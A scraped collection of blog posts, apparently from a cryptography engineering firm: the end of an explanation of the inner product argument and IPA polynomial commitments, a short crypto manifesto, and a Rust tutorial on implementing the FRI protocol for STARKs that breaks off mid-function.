&= \color{blue}{a_1 G_1} + \color{red}{x^{-2} a_2 G_1}

\end{aligned}

$$</p>
Notice how this matches part of $P = \color{blue}{a_1G_1} + a_2G_2 + b_1H_1 + b_2H_2$. The other term appears in $x^{-2}R = \color{red}{x^{-2}a_2G_1} + x^{-2} b_1 H_2 + x^{-2}a_2b_1U$. The rest of the terms behave similarly.</p>
Soundness idea</h4>
In the Bulletproofs paper, the authors prove that, under the discrete log assumption, if the prover could successfully respond with $a’,b’$ for at least $4$ different values of $x$, then two vectors $A$ and $B$ can be extracted from them such that $\langle A, B\rangle = c$ and $P$ is the commitment of the pair $(A, B)$.

So if such $A$ and $B$ don’t exist, there are at most $3$ values of $x$ for which the prover knows $a’$ and $b’$ that make the verifier’s check pass. But the chances that the verifier happens to choose a random $x$ that’s one of those $3$ options, is negligible.</p>
General case for $n = 2^k$</h4>
It is an iterative application of a process in that in each step the prover takes two vectors $A$ and $B$ of size $2^k$ and produces two more vectors $A’$ and $B’$ each of size $2^{k-1}$. In the subsequent step $A’$ and $B’$ take the role of $A$ and $B$ and repeat until $k=0$. In each intermediate step, the bases $G$ and $H$ are updated to halve their length too.

In the first iteration, $A$ and $B$ are the original vectors and the final step is exactly the base case already described for $n=2$. At the end, $A’$ and $B’$ would be of length $1$, so they are just elements of $\mathbb{F}$. They are the elements we denoted by $a’$ and $b’$ above.</p>
Concretely, the first step is as follows.</p>
Let $n = 2^k$ and suppose $k>1$. Otherwise, we follow the case $n=2$ described above.

Write $A = (a_1,\dots, a_{2^k})$ and define the lower and higher parts of $A$ as $A_{lo} := (a_1,\dots,a_{2^{k-1}})$ and $A_{hi} := (a_{2^{k-1}+1}, \dots, a_{2^k})$. The same for $B$, $B_{lo}$ and $B_{hi}$, $G_{lo}$, $G_{hi}$, $H_{lo}$, $H_{hi}$.</p>
The protocol starts also with the verifier choosing a random element $U$ in $\mathbb{G}$ and sending it to the prover. This only happens at the very first round. The same element $U$ is then used throughout all rounds.</p>
The prover computes the following vectors and sends them to the verifier</p>
    * $L := \langle A_{lo}, G_{hi} \rangle + \langle B_{hi}, H_{lo} \rangle + \langle A_{lo}, B_{hi}\rangle U$, and</span></span>
    * $R := \langle A_{hi}, G_{lo} \rangle + \langle B_{lo}, H_{hi} \rangle + \langle A_{hi}, B_{lo}\rangle U$.</span></span></code></pre>
The verifier chooses a random non-zero value $x\in\mathbb{F}$ and sends it to the prover.</p>
At this point, the next step starts. The prover computes</p>
    * $A' := x A_{lo} + x^{-1} A_{hi}$,</span></span>
    * $B' := x^{-1} B_{lo} + x B_{hi}$.</span></span></code></pre>
These will take the roles of $A$ and $B$. The bases are updated similarly to $A$ and $B$. Meaning, in the next step, instead of $G$ and $H$, the following bases are used:</p>
    * $G' := x^{-1} G_{lo} + x G_{hi}$.</span></span>
    * $H' := x H_{lo} + x^{-1} H_{hi}$.</span></span></code></pre>
Finally, the verifier accepts if and only if the check at the last step ($n$=2) succeeds.</p>
Polynomial commitment scheme</h1>
There is a polynomial commitment scheme inspired by the IPA protocol. This is used in the Halo2</a> proving system.</p>
A polynomial commitment scheme has two parts:</p>
    * **Commit** : given a polynomial $p$, the prover produces an object that's unique to $p$. We denote it here by $[p]$ and is called the _commitment_ of $p$. The prover usually sends $[p]$ to the verifier. The object $[p]$ is a sort of hash of $p$.</span></span>
    * **Open** : This is an interactive protocol between the prover and the verifier. The verifier only holds the commitment $[p]$ of some polynomial and sends a value $z$ to the prover at which he wants to know the value $p(z)$. The prover responds with a value $c$ and then they engage in the _Open_ protocol. As a result of it, the verifier gets convinced that the polynomial that corresponds to the commitment $[p]$ evaluates to $c$ at $z$.</span></span></code></pre>
The idea to build a polynomial commitment scheme out of IPA is primarily based on two observations.</p>
    * A polynomial $p = \sum_{i=0}^{n-1} a_i X^i$ is uniquely determined by the vector of its coefficients $A = (a_0, \dots, a_{n-1})$.</span></span>
    * The evaluation of $p$ at an element $z$ is precisely the inner product between the vector $A$ of coefficients of $p$ and the vector $B$ of power of $z$. More precisely, if $p = \sum_{i=0}^{n-1} a_i X^i$, then</span></span></code></pre>
$$ p(z) = \langle A, B\rangle,$$

where $A = (a_0, \dots, a_n)$ and $B = (1, z, z^2, \dots, z^n)$.</p>
As we’ll see shortly, the commitment of the polynomial $p$ is very similar to the commitment $P$ of $(A, B)$ in IPA. The open protocol is very similar too. And it proves that a value $c$ is actually $c = \langle A, B\rangle$, which is $p(z)$ by the way $B$ is defined.

A major difference with IPA is that, in this case, the vector $B$ is always known to the verifier. So the terms that correspond to $B$ in the commitment are unnecessary. This makes the sequence $H_1,\dots, H_n$ unnecessary too. Instead of completely removing those terms, a random value is added by the prover, but with another purpose. It is called the blinding factor</em> and it’s there to add zero knowledge to the protocols.</p>
Setup</h3>
As with IPA, there is a setup phase where the needed ingredients are produced:</p>
    * A commutative group $\mathbb{G}$ with $p$ elements. As before, we'll use additive notation.</span></span>
    * A sequences of elements $G_0,\dots, G_{n-1} \in \mathbb{G}$ and a single element $H\in\mathbb{G}$.</span></span></code></pre>Commit</h3>
Given a polynomial $p = \sum_{i=0}^{n-1} a_i X^i$, to produce the commitment $[p]$ of it, the prover chooses a random value $r\in\mathbb{F}$ and computes</p>
$$[p] := a_0G_0 + \cdots + a_{n-1}G_{n-1} + rH.$$</p>
The value $r$ is called the blinding factor</em>. The prover always keeps track of which values $r$ were used for each of the produced commitments $[p]$. This is because he’ll need them later on for the Open protocol. Formally, what we described is a commitment to the pair $(p, r)$ and we should write it as $[(p,r)]$. But to ease notation we drop the explicit mention to the blinding factor $r$.</p>
Open</h3>
Recall we are assuming here that the verifier already holds a commitment $[p]$ to a polynomial $p$, known to the prover. The prover also knows the value $r$ he used to produce the commitment $[p]$. Also, the verifier has already sent an element $z$ in $\mathbb{F}$ at which he wants to know the value of $p(z)$. The prover responded with a purpoted value $c$. What follows is the Open protocol in which they engage to convince the verifier that $c = p(z)$.</p>
Case $n=2$</h4>
Let’s begin with the base case. As with IPA, this will be the base case to which all the other cases reduce to.</p>
When $n=2$, the polynomial $p$ is of degree at most $1$, that is, $p=a_0 + a_1 X$. Let $A=(a_0, a_1)$ and $B=(1, z)$. Define $b_0 = 1$ and $b_1=z$.</p>
The interaction starts with the verifier choosing a random element $U$ in $\mathbb{G}$ and sending it to the prover.</p>
The prover chooses random values $s, s’ \in \mathbb{F}$ and responds the verifier with the following elements</p>
    * $L := a_0G_1 + sH + a_0b_1U$ and</span></span>
    * $R := a_1G_0 + s'H + a_1b_0U$.</span></span></code></pre>
The verifier chooses a random non-zero value $x\in\mathbb{F}$ and sends it to the prover, who uses it to compute the following elements.</p>
    * $a' := a_0 x + a_1 x^{-1}$</span></span>
    * $b' := b_0 x^{-1} + b_1 x$</span></span></code></pre>
The prover sends $a’$ and $b’$ to the verifier along with the element $r’ := sx^2 + r + s’x^{ - 2}$. Finally, the verifier checks that:</p>
$$

\begin{equation}

x^2 L + [p] + x^{-2} R + c U = x^{-1} a’ G_0 + xa’ G_1 + r’ H + a’b’U

\end{equation}

$$</p>
The verifier accepts if and only if the above equality holds.</p>
General case $n=2^k$</h4>
The idea is the same as in IPA. It is a recursive argument.</p>
Let $n = 2^k$ and suppose $k>1$. If $k=1$, we follow the case $n=2$ described above.

Write $p = \sum_{i=0}^{n-1}a_iX^i$. As before, define $A = (a_0,\dots, a_{2^k-1})$ and $B=(1, z, \dots, z^{n-1})$. Let the lower and higher parts of $A$ be the first and second halves of it. The same for the rest of the vectors involved.</p>
The protocol starts also with the verifier choosing a random element $U$ in $\mathbb{G}$ and sending it to the prover.</p>
The prover chooses random elements $s, s’$ in $\mathbb{F}$. He computes the following vectors and sends them to the verifier</p>
    * $L := \langle A_{lo}, G_{hi} \rangle + sH + \langle A_{lo}, B_{hi}\rangle U$, and</span></span>
    * $R := \langle A_{hi}, G_{lo} \rangle + s'H + \langle A_{hi}, B_{lo}\rangle U$.</span></span></code></pre>
The verifier chooses a random non-zero value $x\in\mathbb{F}$ and sends it to the prover.</p>
At this point, the next step starts. The prover computes</p>
    * $A' := x A_{lo} + x^{-1} A_{hi}$,</span></span>
    * $B' := x^{-1} B_{lo} + x B_{hi}$.</span></span></code></pre>
These will take the roles of $A$ and $B$. The following basis is used in the next round instead of $G$:</p>
    * $G' := x^{-1} G_{lo} + x G_{hi}$.</span></span></code></pre>
The verifier accepts if and only if the check at the last step ($n$=2) succeeds.</p>
To be continued</h1>
In a follow-up blogpost we’ll discuss the complexity of these protocols and we’ll see how they can be optimized and used in recursive arguments of knowledge.</p>


Lambda Crypto Doctrine
Unknown — Wed, 23 Aug 2023 00:00:00 +0000
</p>
We believe crypto has been incredibly successful at providing a trustless financial layer for the 21st century. In particular it has found product market fit in two main areas:</p>
    * In developing countries providing aids and tools to individuals that need to fight against inflation, censorship and for companies and individuals to be able to business.</span></span>
    * Internet native communities that need a financial layer in the web that allows them to express and coordinate at a scale that wasn’t possible before. They have created new financial assets and markets that seem absurd from outside. Many times they are also absurd from the inside.</span></span></code></pre>
People that don’t live in a developing country or that didn’t grow up with the internet have enormous difficulties understanding crypto because they don’t have skin in its game. They believe crypto doesn’t have any “real” use case or that is not serious enough. They are right. The thing is that we are living in a world that’s is becoming more absurd. Memes do not only make you laugh anymore, memes are now winning elections.</p>
We’re sure that these two use cases will grow with time and probably new ones will be found. The world is becoming more chaotic and more divided each day. The stability that existed since the fall of the Soviet Union and the beginning of the pandemic appears to have become a thing of the past. Only change will become the norm. And we love it.</p>
This will make crypto even bigger. One of its prime advantages is that it kills many of the middlemen and allow us to coordinate even in the harshest environments. Trust assumptions are lowered thanks to economic incentives, compilers, distributed systems and cryptography. Crypto lowers the reliance on human beings. This empowers humans. It allows them to concentrate their disputes and efforts in subjectives areas. Crypto creates safe zones where some parts of the human activity becomes non-debatable (until quantum computers solve the discrete log problem).</p>
Most of us are internet natives. We have been using irc, 4chan, reddit, hacker news, twitter, Bitcoin and Ethereum since their beginning and our organization has deep roots in unstable countries. In our roots we have a strange mix of knowing what it is to live in very chaotic societies and how to develop businesses within them and at the same time we are builders that love working in the frontier of engineering and scientific developments. We are the Fremen of crypto, raised in a harsh environment.</p>
Open source and decentralization are not only philosophical ideas but necessary practical conditions to build crypto. Building in the open, helping onboard others and creating movements bigger than the original project are crucial for crypto projects to succeed long term. Sometimes it’s difficult for us to explain our actions to others that don’t follow the same ethos since we are not maximizing the same outcomes.</p>
Our main objective is to help these new internet highways to be built in sustainable ways. Economic sustainability is one key aspect but there are others. We are a force that builds large technological projects but that also counterweights the natural tendency to centralize as a side effect of optimization. Centralization is easier and cheaper in the short run. If we would want to optimize money, there are easier ways to do it. The thing is that is not our main objective. We only see money as a tool to achieve our objectives.</p>
With or without money you will find us building. You are invited to join us in our journey.</p>
“Top-down management leveraging command-and-control hierarchies are for the mahogany boardrooms of yesteryear. We are navigators, adventurers, and explorers of the future. We are married to the sea” - Yearn’s Blue Pill</em></p>


How to code FRI from scratch
Unknown — Fri, 18 Aug 2023 00:00:00 +0000
Introduction</h2>
STARKs</a> (scalable transparent arguments of knowledge) have gained a lot of attention in recent years due to their capacity to help scale Ethereum and other L1s. They provide a way to guarantee the integrity of a computation carried out by an untrusted party via cryptographic proof. This proof can be verified much faster than the trivial check of the computation, that is, rerunning the whole computation by other parties. The key idea is that the whole computation can be expressed as a table of values and a set of polynomial constraints they must satisfy. This set of constraints can be converted into a random linear combination of quotients of polynomials of the form (we will not go into the details of this transformation. For an intro, see Stark-101</a> or our blog</a>)

$$p_0 (x) = \sum_k \alpha_k \frac{c_k (x)}{z_k (x)}$$

where $c_k (x)$ and $z_k (x)$ are polynomials. The computation is valid if $p_0 (x)$ is a polynomial (if not, it will be a rational function) and will happen if each $c_k (x)$ is divisible</a> by its corresponding $z_k (x)$. How can we convince a verifier quickly that the previous $p_0 (x)$ is a polynomial? The key ingredient is the FRI protocol, which we will cover in the following sections. The code presented is taken from the Stark Platinum Prover</a></p>
If you want to learn more about the FRI protocol and its properties, we recommend you read the original STARKs paper</a> and A summary on the FRI low degree test</a>. We want to thank Eli Ben-Sasson and the amazing Starkware team for helping us learn the protocol and in developing the prover.</p>
The idea behind FRI</h2>
FRI stands for Fast Reed-Solomon Interactive oracle proof of proximity. It allows us to prove that the evaluations of a given function, $p$, over a domain, $D_0$ correspond to the evaluations of a low-degree polynomial (with respect to the size of $D_0$). Why is this useful?</p>
Suppose we want to convince someone that we have some polynomial, $p_0$ of degree $N$. We could pass all the values of the $N+1$ coefficients or $N+1$ evaluations of the polynomial over some set. The problem is that we must pass $N+1$ numbers (in STARKs, the degree $N$ can be large), and the proof and verification will not be short. We could do better by reducing the degree of the polynomial by some suitable transformation. We can split the polynomial into the odd and even degree powers (we will suppose that $N$ is odd, but this doesn’t matter),

$p_0 (x) = p_{0,e} ( x^2 ) + x p_{0,o} (x^2 )$

where

$p_{0,e} ( x^2 ) = a_0 + a_2 x^2 + a_4 x^4 + … + a_{N-1} x^{N-1}$

and

$p_{0,o} ( x^2 ) = a_1 + a_3 x^2 + a_5 x^4 + … + a_N x^{N-1}$

we can randomly fold the two parts by getting a random $\beta_0$ and create a polynomial of degree $(N - 1) / 2$,

$p_1 (y) = (a_0 + \beta_0 a_1 ) + (a_2 + \beta_0 a_3 ) y + … + (a_{N-1} + \beta_0 a_N ) y^{(N - 1)/2}$

We could show that we have a polynomial by passing all the $(N + 1)/2$ coefficients of $p_1 (y)$ and some evaluations of $p_0 (x)$ to show that we deduced correctly $p_1 (y)$ from $p_0 (x)$.</p>
Of course, why would we stop with $(N + 1)/2$ coefficients when we could further reduce the number of coefficients by repeating the same strategy?

$p_1 (y) = p_{1,e} ( y^2 ) + y p_{1,o} (y^2 )$

where

$p_{1,e} ( y^2 ) = b_0 + b_2 y^2 + b_4 y^4 + … + b_{M} y^{M-1}$

and

$p_{1,o} ( y^2 ) = b_1 + b_3 y^2 + b_5 y^4 + … + b_M y^{M-1}$

Then, we sample randomly $\beta_1$ and fold

$p_2 (z) = (b_0 + \beta_1 b_1 ) + (b_2 + \beta_1 b_3 ) z + … + (b_{M-1} + \beta_1 a_M ) z^{(M - 1)/2}$

We can do this and reduce the degree of the polynomial by half at each step. After the $\log_2 (N)$ steps, we arrive at a constant polynomial and only need to pass that value. We could be convinced that we were given a polynomial if we could go down these foldings and arrive at the last constant value.</p>
Below we give the rust code to fold a polynomial used in Lambdaworks:</p>
pub fn fold_polynomial<F>(</span></span>
    poly: &Polynomial<FieldElement<F>>,</span></span>
    beta: &FieldElement<F>,</span></span>
) -> Polynomial<FieldElement<F>></span></span>
where</span></span>
    F: IsField,</span></span>
{</span></span>
    let coef = poly.coefficients();</span></span>
    let even_coef: Vec<FieldElement<F>> = coef.iter().step_by(2).cloned().collect();</span></span>
</span>
    // odd coefficients of poly are multiplied by beta</span></span>
    let odd_coef_mul_beta: Vec<FieldElement<F>> = coef</span></span>
        .iter()</span></span>
        .skip(1)</span></span>
        .step_by(2)</span></span>
        .map(|v| (v.clone()) * beta)</span></span>
        .collect();</span></span>
</span>
    let (even_poly, odd_poly) = Polynomial::pad_with_zero_coefficients(</span></span>
        &Polynomial::new(&even_coef),</span></span>
        &Polynomial::new(&odd_coef_mul_beta),</span></span>
    );</span></span>
    even_poly + odd_poly</span></span>
}</span></span></code></pre>
The polynomial poly</code> is a variable that contains the coefficients of the polynomial as a vector of field elements. We collect the values of even degree coefficients in line 9, and we take all the odd degree coefficients and multiply them by $\beta$ in lines 12 to 17 (we could also make it more efficient by zipping the iterators and avoiding collecting the results and then iterating again over the arrays to add the values).</p>
The problem is that we need to ensure that the polynomials cannot be changed to generate random values. One way to bind us to a polynomial is to build a Merkle tree</a> from the evaluations of the polynomial over a suitable domain (this is the part where Reed-Solomon codes come into play). We take a domain $D_0 = { \omega, \omega g, \omega g^2 , … , \omega g^{\alpha N - 1} }$, where $g$ is a generator of the $\alpha N$ roots of unity and $\omega$ is an element outside the set generated by the powers of $g$. This way, we are forced to provide only values in the tree; the security of this scheme depends on the collision resistance of the hash function used to build the tree. For every folding step, we will have to make a layer containing the values of the evaluations of the polynomial and its corresponding Merkle tree. An advantage of using $D_0$ as a domain is that when we consider the domain $D_1$ for $y = x^2$, its size is exactly half the size of $D_0$. Therefore, the size of the tree for $p_1 (y)$ will be smaller than the size of the one corresponding to $p_0 (x)$ (this is a property of the $n$-th roots of unity, when $n$ is a power of 2. If $x_0$ is in the set, so is $- x_0$ and $x_0^2 = (- x_0)^2 = x_0^2$, so we only have $n/2$ different elements).</p>
FRI is also useful for creating a commitment scheme for polynomials using Merkle trees. If we want to show someone that we have a low degree polynomial $p(x)$ such that $p(z) = v$, we can evaluate the following quotient,

$$q (x) = \frac{p(x) - v}{ x - z}$$

and apply the FRI protocol to that quotient to show that it is indeed a low-degree polynomial.</p>
Creating FRI layers</h2>
As mentioned before, we need to commit ourselves to our polynomial, and we will do that by creating a Merkle tree with the evaluations over a suitable domain. Below we provide a basic structure for a FriLayer: a vector of evaluations and a Merkle tree (we add the coset offset, $\omega$, and domain size just for convenience).</p>
#[derive(Clone)]</span></span>
pub struct FriLayer<F></span></span>
where</span></span>
    F: IsField,</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    pub evaluation: Vec<FieldElement<F>>,</span></span>
    pub merkle_tree: FriMerkleTree<F>,</span></span>
    pub coset_offset: FieldElement<F>,</span></span>
    pub domain_size: usize,</span></span>
}</span></span>
</span>
impl<F> FriLayer<F></span></span>
where</span></span>
    F: IsField + IsFFTField,</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    pub fn new(</span></span>
        poly: &Polynomial<FieldElement<F>>,</span></span>
        coset_offset: &FieldElement<F>,</span></span>
        domain_size: usize,</span></span>
    ) -> Self {</span></span>
        let evaluation = poly</span></span>
            .evaluate_offset_fft(1, Some(domain_size), coset_offset)</span></span>
            .unwrap(); </span></span>
</span>
        let merkle_tree = FriMerkleTree::build(&evaluation);</span></span>
</span>
        Self {</span></span>
            evaluation,</span></span>
            merkle_tree,</span></span>
            coset_offset: coset_offset.clone(),</span></span>
            domain_size,</span></span>
        }</span></span>
    }</span></span>
}</span></span></code></pre>
We also provide a method to create layers, given a polynomial, the domain size, and the domain offset. This will be combined later with the folding function to create new polynomials and obtain the different layers.</p>
Given the polynomial, we can evaluate it efficiently using FFT (due to the particular structure we are using) and obtain a vector of field elements, as shown in line 23. In line 27, we build the Merkle tree from the vector of evaluations (if you want to learn more on how the Merkle tree works behind the scenes, see here</a>). In the next section, we will show how to build and commit to all the FRI layers. After this stage, we can prove we committed to a low-degree polynomial.</p>
FRI commitment phase</h2>
Now that we can fold polynomials and build layers, we can commit to every layer and get the first part of the FRI protocol. The commit phase will give us a vector of layers and the final value of the FRI protocol (when we get to a degree zero polynomial). The function needs to receive the number of layers (which can be obtained from the degree of the polynomial), the polynomial in coefficient form, the transcript of the protocol (we will be appending here the roots of the Merkle trees and use this to generate the random challenges by the Fiat-Shamir transformation), the offset and domain size (we could give the domain $D_0$ instead of these last two). The domain size determines the size of the group of roots of unity, and the offset allows us to shift that group.</p>
pub fn fri_commit_phase<F: IsField + IsFFTField, T: Transcript>(</span></span>
    number_layers: usize,</span></span>
    p_0: Polynomial<FieldElement<F>>,</span></span>
    transcript: &mut T,</span></span>
    coset_offset: &FieldElement<F>,</span></span>
    domain_size: usize,</span></span>
) -> (FieldElement<F>, Vec<FriLayer<F>>)</span></span>
where</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    let mut domain_size = domain_size;</span></span>
</span>
    let mut fri_layer_list = Vec::with_capacity(number_layers);</span></span>
    let mut current_layer = FriLayer::new(&p_0, coset_offset, domain_size);</span></span>
    fri_layer_list.push(current_layer.clone());</span></span>
    let mut current_poly = p_0;</span></span>
    // >>>> Send commitment: [p₀]</span></span>
    transcript.append(&current_layer.merkle_tree.root);</span></span>
</span>
    let mut coset_offset = coset_offset.clone();</span></span>
</span>
    for _ in 1..number_layers {</span></span>
        // <<<< Receive challenge 𝜁ₖ₋₁</span></span>
        let zeta = transcript_to_field(transcript);</span></span>
        coset_offset = coset_offset.square();</span></span>
        domain_size /= 2;</span></span>
</span>
        // Compute layer polynomial and domain</span></span>
        current_poly = fold_polynomial(&current_poly, &zeta);</span></span>
        current_layer = FriLayer::new(&current_poly, &coset_offset, domain_size);</span></span>
        let new_data = &current_layer.merkle_tree.root;</span></span>
        fri_layer_list.push(current_layer.clone()); // TODO: remove this clone</span></span>
</span>
        // >>>> Send commitment: [pₖ]</span></span>
        transcript.append(new_data);</span></span>
    }</span></span>
</span>
    // <<<< Receive challenge: 𝜁ₙ₋₁</span></span>
    let zeta = transcript_to_field(transcript);</span></span>
</span>
    let last_poly = fold_polynomial(&current_poly, &zeta);</span></span>
</span>
    let last_value = last_poly</span></span>
        .coefficients()</span></span>
        .get(0)</span></span>
        .unwrap_or(&FieldElement::zero())</span></span>
        .clone();</span></span>
</span>
    // >>>> Send value: pₙ</span></span>
    transcript.append(&last_value.to_bytes_be());</span></span>
</span>
    (last_value, fri_layer_list)</span></span>
}</span></span></code></pre>
We start by creating the layer for the first polynomial (which, in the context of a STARK prover, is the DEEP composition polynomial) at line 14. Then, we commit to the polynomial evaluations using the Merkle tree by appending the root to the transcript (line 18).</p>
Afterward, we continue with the recursive part of FRI: we sample the random coefficient ($\zeta$ in the code, line 24), we square the offset and reduce the domain size (so that we can generate the next evaluation domain), and we fold the polynomial in line 29. We obtain the new layer (line 30), add the root to the transcript (so that we commit to the evaluations of the new polynomial) and add the new layer to the vector of FriLayers. After we have gone through the recursive parts, we fold one last time to arrive at the degree zero polynomial and get the final value, which we also append to the transcript (line 50).</p>
FRI decommitment</h2>
Now that we created all the commitments, we need to generate the proof so that a verifier can check that everything was done correctly. The only things we can pass to the verifier are values that we committed to by using Merkle trees. Any evaluation in a tree can be calculated from the evaluations inside a tree in the previous layers. We can see that:

$$p_{0,e} (x) = \frac{p_0 (x) + p_0( - x )}{2}$$

and

$$p_{0,o} (x) = \frac{p_0 (x) - p_0( - x )}{2x}$$

Luckily, if $p_0 (x_0)$ is in the Merkle tree, so is $p_0 (- x_0 )$, because of how we chose the domain $D_0$ . We can see then that

$$p_1 ( x_0^2 ) = \frac{p_0 ( x_0 ) + p_0( - x_0 )}{2} + \beta_0 \frac{(p_0 ( x_0 ) - p_0( - x_0 ))}{2x_0}$$

Similarly,

$$p_k ( w_0^2 ) = \frac{p_{k - 1} ( w_0 ) + p_{ k - 1}( - w_0 )}{2} + \beta_0 \frac{(p_{ k - 1 } ( w_0 ) - p_{ k - 1}( - w_0 ))}{2w_0}$$

Therefore, we can check a value in a tree if we pass two values from the tree from the previous layer (these have to be the correct pair, which, owing to the structure of the evaluation domain, are always separated by half the length of the size of the tree).</p>
We will let the verifier choose an index in the Merkle tree of $p_0 (x)$. We will provide the verifier with the values of $p_0 (x_0)$ (where $x_0$ is the point in the domain corresponding to the index chosen by the verifier) and $p_0 (-x_0)$, $p_1 ( x_0^2 )$, $p_1 ( - (x_0^2 ))$, $p_2 ( x_0^4 )$, $p_2 ( - (x_0^4 ))$ until $p_{ N - 1 } ( x_0^{ 2^{ N - 1 }} )$, $p_{ N - 1} ( - (x_0^{ 2^{ N - 1 }} ))$. This way, the verifier can go from the first polynomial to the final value and check that we did everything correctly. We must also show him that the values we passed belong to their correspondent Merkle tree. We will do this by providing him with an inclusion proof, given by the authentication paths for each value. If the inclusion proofs and calculations between the layers pass, the verifier will be convinced that we did things correctly for one point. However, passing the test for one point does not mean that the function is indeed a polynomial because FRI has a statistical nature. Of course, the verifier could choose more points, and if the test passes for all points, the verifier could be convinced with a high probability that the function is indeed a polynomial. We will call each point the verifier chooses a query (the higher the number of queries, the more likely the prover will be caught cheating).</p>
To handle each query better, we will have a FriDecommitment structure containing all the evaluation pairs (layers_evaluations</code> and layers_evaluations_sym</code>) and authentication paths for each (layers_auth_paths</code> and layers_auth_paths_sym</code>).</p>
pub struct FriDecommitment<F: IsPrimeField> {</span></span>
    pub layers_auth_paths_sym: Vec<Proof<Commitment>>,</span></span>
    pub layers_evaluations_sym: Vec<FieldElement<F>>,</span></span>
    pub layers_auth_paths: Vec<Proof<Commitment>>,</span></span>
    pub layers_evaluations: Vec<FieldElement<F>>,</span></span>
}</span></span></code></pre>
We can now jump onto the query phase of the protocol and obtain the proof for the FRI protocol. Since we want the protocol to be non-interactive, we need the transcript (to simulate the verifier by Fiat-Shamir transformation), all the information from the FriLayers, and other parameters, such as the number of queries (contained here inside the air).</p>
pub fn fri_query_phase<F, A, T>(</span></span>
    air: &A,</span></span>
    domain_size: usize,</span></span>
    fri_layers: &Vec<FriLayer<F>>,</span></span>
    transcript: &mut T,</span></span>
) -> (Vec<FriDecommitment<F>>, Vec<usize>)</span></span>
where</span></span>
    F: IsFFTField,</span></span>
    A: AIR<Field = F>,</span></span>
    T: Transcript,</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    if !fri_layers.is_empty() {</span></span>
        let number_of_queries = air.options().fri_number_of_queries;</span></span>
        let iotas = (0..number_of_queries)</span></span>
            .map(|_| (transcript_to_u32(transcript) as usize) % domain_size)</span></span>
            .collect::<Vec<usize>>();</span></span>
        let query_list = iotas</span></span>
            .iter()</span></span>
            .map(|iota_s| {</span></span>
                // <<<< Receive challenge 𝜄ₛ (iota_s)</span></span>
                let mut layers_auth_paths_sym = vec![];</span></span>
                let mut layers_evaluations_sym = vec![];</span></span>
                let mut layers_evaluations = vec![];</span></span>
                let mut layers_auth_paths = vec![];</span></span>
</span>
                for layer in fri_layers {</span></span>
                    // symmetric element</span></span>
                    let index = iota_s % layer.domain_size;</span></span>
                    let index_sym = (iota_s + layer.domain_size / 2) % layer.domain_size;</span></span>
                    let evaluation_sym = layer.evaluation[index_sym].clone();</span></span>
                    let auth_path_sym = layer.merkle_tree.get_proof_by_pos(index_sym).unwrap();</span></span>
                    let evaluation = layer.evaluation[index].clone();</span></span>
                    let auth_path = layer.merkle_tree.get_proof_by_pos(index).unwrap();</span></span>
                    layers_auth_paths_sym.push(auth_path_sym);</span></span>
                    layers_evaluations_sym.push(evaluation_sym);</span></span>
                    layers_evaluations.push(evaluation);</span></span>
                    layers_auth_paths.push(auth_path);</span></span>
                }</span></span>
</span>
                FriDecommitment {</span></span>
                    layers_auth_paths_sym,</span></span>
                    layers_evaluations_sym,</span></span>
                    layers_evaluations,</span></span>
                    layers_auth_paths,</span></span>
                }</span></span>
            })</span></span>
            .collect();</span></span>
</span>
        (query_list, iotas)</span></span>
    } else {</span></span>
        (vec![], vec![])</span></span>
    }</span></span>
}</span></span></code></pre>
In line 15, we sample all the indexed to open in the Merkle tree belonging to $p_0 (x)$. We normalize by the domain size to ensure the queries fall in the range. Once we get all the indexes to query, we can iterate over them as in line 18 (in this case, we could do it in parallel). For each index, we will go through each FriLayer and get the indexes for $p_k ( u )$ and $p_k ( - u)$ (this is done by taking the remainder between the current index and the domain size for the FriLayer), as in lines 29 and 30, and then take the values of the leaves in the Merkle tree (lines 31 and 33), together with the corresponding authentication paths (lines 32 and 34). We then add each to the vectors containing the evaluations and authentication paths for each query. Finally, we get the complete list of queries and all the necessary values.</p>
Verification</h2>
If a verifier wants to check our work, he needs to perform both the inclusion proofs (to see all values belong to Merkle trees) and that each layer is obtained from the previous one until we reach degree zero. Since the protocol was done non-interactively, the verifier must replay all the random $\beta_k$. We will only focus on the FRI part, but remember that in a general STARK prover, we have more work before that:</p>
let merkle_roots = &proof.fri_layers_merkle_roots;</span></span>
    let zetas = merkle_roots</span></span>
        .iter()</span></span>
        .map(|root| {</span></span>
            // <<<< Receive commitment: [pₖ] (the first one is [p₀])</span></span>
            transcript.append(root);</span></span>
</span>
            // >>>> Send challenge 𝜁ₖ</span></span>
            transcript_to_field(transcript)</span></span>
        })</span></span>
        .collect::<Vec<FieldElement<F>>>();</span></span>
</span>
    // <<<< Receive value: pₙ</span></span>
    transcript.append(&proof.fri_last_value.to_bytes_be());</span></span>
</span>
    // Receive grinding value</span></span>
    // 1) Receive challenge from the transcript</span></span>
    let transcript_challenge = transcript.challenge();</span></span>
    let nonce = proof.nonce;</span></span>
    let leading_zeros_count =</span></span>
        hash_transcript_with_int_and_get_leading_zeros(&transcript_challenge, nonce);</span></span>
    transcript.append(&nonce.to_be_bytes());</span></span>
</span>
    // FRI query phase</span></span>
    // <<<< Send challenges 𝜄ₛ (iota_s)</span></span>
    let iota_max: usize = 2_usize.pow(domain.lde_root_order);</span></span>
    let iotas: Vec<usize> = (0..air.options().fri_number_of_queries)</span></span>
        .map(|_| (transcript_to_u32(transcript) as usize) % iota_max)</span></span>
        .collect();</span></span></code></pre>
The verifier appends to the transcript the roots of each Merkle tree, one at a time, and gets the value for $\beta_k$ (lines 2 to 11). Then, the verifier adds the final value of the FRI protocol (line 14); if there is proof of work, after the verifier has checked that the nonce provided is correct (done before), he adds the nonce to the transcript and samples all the indexes.</p>
With this, the verifier can proceed to check all queries,</p>
fn verify_fri<F, A>(</span></span>
    proof: &StarkProof<F>,</span></span>
    domain: &Domain<F>,</span></span>
    challenges: &Challenges<F, A>,</span></span>
) -> bool</span></span>
where</span></span>
    F: IsFFTField,</span></span>
    FieldElement<F>: ByteConversion,</span></span>
    A: AIR<Field = F>,</span></span>
{</span></span>
    // verify FRI</span></span>
    let two_inv = &FieldElement::from(2).inv();</span></span>
    let mut evaluation_point_inverse = challenges</span></span>
        .iotas</span></span>
        .iter()</span></span>
        .map(|iota| &domain.lde_roots_of_unity_coset[*iota])</span></span>
        .cloned()</span></span>
        .collect::<Vec<FieldElement<F>>>();</span></span>
    FieldElement::inplace_batch_inverse(&mut evaluation_point_inverse);</span></span>
    proof</span></span>
        .query_list</span></span>
        .iter()</span></span>
